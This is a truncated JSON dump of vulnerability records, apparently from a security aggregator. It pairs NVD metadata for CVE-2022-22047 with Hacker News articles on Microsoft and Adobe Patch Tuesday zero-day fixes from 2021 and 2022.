"cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:44:04", "description": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22047", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2023-05-17T17:15:00", "cpe": ["cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2022-22047", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*"]}], "thn": [{"lastseen": "2022-05-09T12:37:59", "description": "[](<https://thehackernews.com/images/-Oinzu8T6SmI/YMBZ7WkhbJI/AAAAAAAACzI/kVA4Ura4Yl4MrNb_jPNPBtgjkBj1DSs1wCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on Tuesday released another round of [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jun>) for Windows operating system and other supported software, squashing 50 vulnerabilities, including six zero-days that are said to be under active attack.\n\nThe flaws were identified and resolved in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code - Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nOf these 50 bugs, five are rated Critical, and 45 are rated Important in severity, with three of the issues publicly known at the time of release. The vulnerabilities that being actively exploited are listed below -\n\n * [**CVE-2021-33742**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) (CVSS score: 7.5) - Windows MSHTML Platform Remote Code Execution Vulnerability\n * [**CVE-2021-33739**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) (CVSS score: 8.4) - Microsoft DWM Core Library Elevation of Privilege Vulnerability\n * [**CVE-2021-31199**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31201**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31955**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) (CVSS score: 5.5) - Windows Kernel Information Disclosure Vulnerability\n * [**CVE-2021-31956**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) (CVSS score: 7.8) - Windows NTFS Elevation of Privilege Vulnerability\n\nMicrosoft didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them. But the fact that four of the six flaws are privilege escalation vulnerabilities suggests that attackers could be leveraging them as part of an infection chain to gain elevated permissions on the targeted systems to execute malicious code or leak sensitive information.\n\nThe Windows maker also noted that both CVE-2021-31201 and CVE-2021-31199 address flaws related to [CVE-2021-28550](<https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html>), an arbitrary code execution vulnerability rectified by Adobe last month that it said was being \"exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\"\n\nGoogle's Threat Analysis Group, which has been acknowledged as having reported CVE-2021-33742 to Microsoft, [said](<https://twitter.com/ShaneHuntley/status/1402320072123719690>) \"this seem[s] to be a commercial exploit company providing capability for limited nation state Eastern Europe / Middle East targeting.\"\n\nRussian cybersecurity firm Kaspersky, for its part, detailed that CVE-2021-31955 and CVE-2021-31956 were abused in a Chrome zero-day exploit chain ([CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>)) in a series of highly targeted attacks against multiple companies on April 14 and 15. The intrusions were attributed to a new threat actor dubbed \"PuzzleMaker.\"\n\n\"While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges,\" Kaspersky Lab researchers [said](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nElsewhere, Microsoft fixed numerous remote code execution vulnerabilities spanning Paint 3D, Microsoft SharePoint Server, Microsoft Outlook, Microsoft Office Graphics, Microsoft Intune Management Extension, Microsoft Excel, and Microsoft Defender, as well as several privilege escalation flaws in Microsoft Edge, Windows Filter Manager, Windows Kernel, Windows Kernel-Mode Driver, Windows NTLM Elevation, and Windows Print Spooler.\n\nTo install the latest security updates, Windows users can head to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nAlongside Microsoft, a number of other vendors have also released a slew of patches on Tuesday, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-06-01>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Intel](<https://blogs.intel.com/technology/2021/06/intel-security-advisories-for-june-2021/>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-June/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) (with cybersecurity firm Onapsis [credited](<https://onapsis.com/blog/sap-security-patch-day-june-2021-multiple-memory-corruption-vulnerabilities-can-lead-system>) with identifying 20 of the 40 remediated flaws)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-09T06:07:00", "type": "thn", "title": "Update Your Windows Computers to Patch 6 New In-the-Wild Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T16:52:54", "id": "THN:1DDE95EA33D4D9F304973569FC787451", "href": "https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:03", "description": "[](<https://thehackernews.com/images/-pHacbifc0bM/YJtLaUVqNrI/AAAAAAAAChE/JQZWUxanHVEGGJy94zJWtnW3s6teGne7ACLcBGAsYHQ/s0/adobe.jpg>)\n\nAdobe has released [Patch Tuesday updates](<https://helpx.adobe.com/security.html>) for the month of May with fixes for multiple vulnerabilities spanning 12 different products, including a zero-day flaw affecting Adobe Reader that's actively exploited in the wild.\n\nThe list of updated applications includes [Adobe Experience Manager](<https://helpx.adobe.com/security/products/experience-manager/apsb21-15.html>), [Adobe InDesign](<https://helpx.adobe.com/security/products/indesign/apsb21-22.html>), [Adobe Illustrator](<https://helpx.adobe.com/security/products/illustrator/apsb21-24.html>), [Adobe InCopy](<https://helpx.adobe.com/security/products/incopy/apsb21-25.html>), [Adobe Genuine Service](<https://helpx.adobe.com/security/products/integrity_service/apsb21-27.html>), Adobe Acrobat and Reader, [Magento](<https://helpx.adobe.com/security/products/magento/apsb21-30.html>), Adobe [Creative Cloud Desktop](<https://helpx.adobe.com/security/products/creative-cloud/apsb21-31.html>) Application, Adobe [Media Encoder](<https://helpx.adobe.com/security/products/media-encoder/apsb21-32.html>), Adobe [After Effects](<https://helpx.adobe.com/security/products/after_effects/apsb21-33.html>), Adobe Medium, and Adobe Animate.\n\nIn a security bulletin, the company [acknowledged](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>) it received reports that the flaw \"has been exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\" Tracked as CVE-2021-28550, the zero-day concerns an arbitrary code execution flaw that could allow adversaries to execute virtually any command on target systems.\n\n[](<https://thehackernews.com/images/-bGxPAhAwfTI/YJtpVB2NOSI/AAAAAAAAChM/kjgbRzSnNbkEbGKd5h6QkhcEM_bQMjrdgCLcBGAsYHQ/s0/adobe.jpg>)\n\nWhile the targeted attacks took aim at Windows users of Adobe Reader, the issue affects both Windows and macOS versions of Acrobat DC, Acrobat Reader DC, Acrobat 2020, Acrobat Reader 2020, Acrobat 2017, and Acrobat Reader 2017. An anonymous researcher has been credited with reporting the vulnerability.\n\n10 critical and four important vulnerabilities were addressed in Adobe Acrobat and Reader, followed by remediation for five critical flaws (CVE-2021-21101-CVE-2021-21105) in Adobe Illustrator that could lead to arbitrary code execution in the context of the current user. Adobe credited Kushal Arvind Shah of Fortinet's FortiGuard Labs with reporting three of the five vulnerabilities.\n\nIn all, a total of 43 security weaknesses have been resolved in Tuesday's update. Users are advised to update their software installations to the latest versions to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-12T05:41:00", "type": "thn", "title": "Alert: Hackers Exploit Adobe Reader 0-Day Vulnerability in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21101", "CVE-2021-21105", "CVE-2021-28550"], "modified": "2021-05-12T06:42:13", "id": "THN:8243BE07E124CAD984B8B4895550A7CC", "href": "https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:15", "description": "[](<https://thehackernews.com/images/-KFVbzvrTdtw/YRNbSwawxnI/AAAAAAAADfg/bEuoCVHmHHw4ycTXfnhAqcyuUoWDf2W7gCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft on Tuesday rolled out [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Aug>) to address a total of 44 security issues affecting its software products and services, one of which it says is an actively exploited zero-day in the wild.\n\nThe update, which is the smallest release since December 2019, squashes seven Critical and 37 Important bugs in Windows, .NET Core &amp; Visual Studio, Azure, Microsoft Graphics Component, Microsoft Office, Microsoft Scripting Engine, Microsoft Windows Codecs Library, Remote Desktop Client, among others. This is in addition to [seven security flaws](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) it patched in the Microsoft Edge browser on August 5.\n\nChief among the patched issues is [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>) (CVSS score: 7.8), an elevation of privilege flaw affecting Windows Update Medic Service \u2014 a service that enables remediation and protection of Windows Update components \u2014 which could be abused to run malicious programs with escalated permissions.\n\nMicrosoft's Threat Intelligence Center has been credited with reporting the flaw, although the company refrained from sharing additional specifics or detail on how widespread those attacks were in light of active exploitation attempts.\n\nTwo of the security vulnerabilities are publicly known at the time of release -\n\n * [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>) (CVSS score: 9.8) - Windows LSA Spoofing Vulnerability\n * [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36936>) (CVSS score: 8.8) - Windows Print Spooler Remote Code Execution Vulnerability\n\nWhile CVE-2021-36942 contains fixes to secure systems against NTLM relay attacks like [PetitPotam](<https://thehackernews.com/2021/07/new-petitpotam-ntlm-relay-attack-lets.html>) by blocking the LSARPC interface, CVE-2021-36936 resolves yet another remote code execution flaw in the Windows Print Spooler component.\n\n\"An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate against another server using NTLM,\" Microsoft said in its advisory for CVE-2021-36942; adding the \"security update blocks the affected API calls OpenEncryptedFileRawA and OpenEncryptedFileRawW through LSARPC interface.\"\n\nCVE-2021-36936 is also one among the three flaws in the Print Spooler service that Microsoft has fixed this month, with the two other vulnerabilities being [CVE-2021-36947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36947>) and (CVSS score: 8.2) and [CVE-2021-34483](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>) (CVSS score: 7.8), the latter of which concerns an elevation of privilege vulnerability.\n\nIn addition, Microsoft has released [security updates](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) to resolve a previously disclosed remote code execution in the Print Spooler service tracked as [CVE-2021-34481](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) (CVSS score: 8.8). This changes the default behavior of the \"[Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>)\" feature, effectively preventing non-administrator users from installing or updating new and existing printer drivers using drivers from a remote computer or server without first elevating themselves to an administrator.\n\nAnother critical flaw remediated as part of Patch Tuesday updates is [CVE-2021-26424](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26424>) (CVSS score: 9.9), a remote code execution vulnerability in Windows TCP/IP, which Microsoft notes \"is remotely triggerable by a malicious Hyper-V guest sending an ipv6 ping to the Hyper-V host. An attacker could send a specially crafted TCP/IP packet to its host utilizing the TCP/IP Protocol Stack (tcpip.sys) to process packets.\"\n\nTo install the latest security updates, Windows users can head to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nBesides Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including -\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-08-01>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-August/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T05:31:00", "type": "thn", "title": "Microsoft Releases Windows Updates to Patch Actively Exploited Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-36936", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2021-08-11T05:31:39", "id": "THN:F601EBBE359B3547B8E79F0217562FEF", "href": "https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T05:57:21", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhMMVV60incjQemAA8K9lAWSescsqjqG2a3UdVc4GiCMmXBd6175xW7cZiTJONSGUB1N9s-MMZARqaZP7h-OdKy4jUdvvT_H-aPCCLF9TKLu1S1Xcj8NZh673Hir7VOwNMNdOLjEU6LSXewzYkJXyX0Y0dpIn7L1WK7IuD61f1iG8uajyHoBwST8KVh/s728-e100/windows-update.jpg>)\n\nMicrosoft released its monthly round of Patch Tuesday updates to address [84 new security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) spanning multiple product categories, counting a zero-day vulnerability that's under active attack in the wild.\n\nOf the 84 shortcomings, four are rated Critical, and 80 are rated Important in severity. Also separately resolved by the tech giant are [two other bugs](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Edge browser, one of which plugs another [zero-day flaw](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) that Google disclosed as being actively exploited in real-world attacks.\n\nTop of the list of this month's updates is [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) (CVSS score: 7.8), a case of privilege escalation in the Windows Client Server Runtime Subsystem ([CSRSS](<https://en.wikipedia.org/wiki/Client/Server_Runtime_Subsystem>)) that could be abused by an attacker to gain SYSTEM permissions.\n\n\"With this level of access, the attackers are able to disable local services such as Endpoint Detection and Security tools,\" Kev Breen, director of cyber threat research at Immersive Labs, told The Hacker News. \"With SYSTEM access they can also deploy tools like Mimikatz which can be used to recover even more admin and domain level accounts, spreading the threat quickly.\"\n\nVery little is known about the nature and scale of the attacks other than an \"Exploitation Detected\" assessment from Microsoft. The company's Threat Intelligence Center (MSTIC) and Security Response Center (MSRC) have been credited with reporting the flaw.\n\nBesides CVE-2022-22047, two more elevation of privilege flaws have been fixed in the same component \u2014 [CVE-2022-22026](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22026>) (CVSS score: 8.8) and [CVE-2022-22049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22049>) (CVSS score: 7.8) \u2014 that were reported by Google Project Zero researcher Sergei Glazunov.\n\n\"A locally authenticated attacker could send specially crafted data to the local CSRSS service to elevate their privileges from [AppContainer](<https://docs.microsoft.com/windows/win32/secauthz/appcontainer-isolation>) to SYSTEM,\" Microsoft said in an advisory for CVE-2022-22026.\n\n\"Because the AppContainer environment is considered a defensible security boundary, any process that is able to bypass the boundary is considered a change in Scope. The attacker could then execute code or access resources at a higher integrity level than that of the AppContainer execution environment.\"\n\nAlso remediated by Microsoft include a number of remote code execution bugs in Windows Network File System ([CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) and [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>)), Windows Graphics ([CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>)), Remote Procedure Call Runtime ([CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>)), and Windows Shell ([CVE-2022-30222](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30222>)).\n\nThe update further stands out for patching as many as 32 issues in the [Azure Site Recovery](<https://docs.microsoft.com/en-us/azure/site-recovery/site-recovery-overview>) business continuity service. Two of these flaws are related to remote code execution and the remaining 30 concern privilege escalation.\n\n\"Successful exploitation [...] requires an attacker to compromise admin credentials to one of the VMs associated with the configuration server,\" the company said, adding the flaws do not \"allow disclosure of any confidential information, but could allow an attacker to modify data that could result in the service being unavailable.\"\n\nOn top of that, Microsoft's July update also contains fixes for four privilege escalation vulnerabilities in the Windows Print Spooler module ([CVE-2022-22022](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22022>), [CVE-2022-22041](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22041>), [CVE-2022-30206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30206>), and [CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>)) after a [brief respite in June 2022](<https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html>), underscoring what appears to be a never-ending stream of flaws plaguing the technology.\n\nRounding off the Patch Tuesday updates are two notable fixes for tampering vulnerabilities in the Windows Server Service ([CVE-2022-30216](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30216>)) and Microsoft Defender for Endpoint ([CVE-2022-33637](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33637>)) and three denial-of-service (DoS) flaws in Internet Information Services ([CVE-2022-22025](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22025>) and [CVE-2022-22040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22040>)) and Security Account Manager ([CVE-2022-30208](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30208>)).\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/security/bulletin/2022-07-01>)\n * [Apache Projects](<https://blogs.apache.org/foundation/date/20220712>)\n * [Cisco](<https://thehackernews.com/2022/07/cisco-and-fortinet-release-security.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Fortinet](<https://thehackernews.com/2022/07/cisco-and-fortinet-release-security.html>)\n * [GitLab](<https://about.gitlab.com/releases/2022/07/04/gitlab-15-1-2-released/>)\n * [Google Chrome](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red 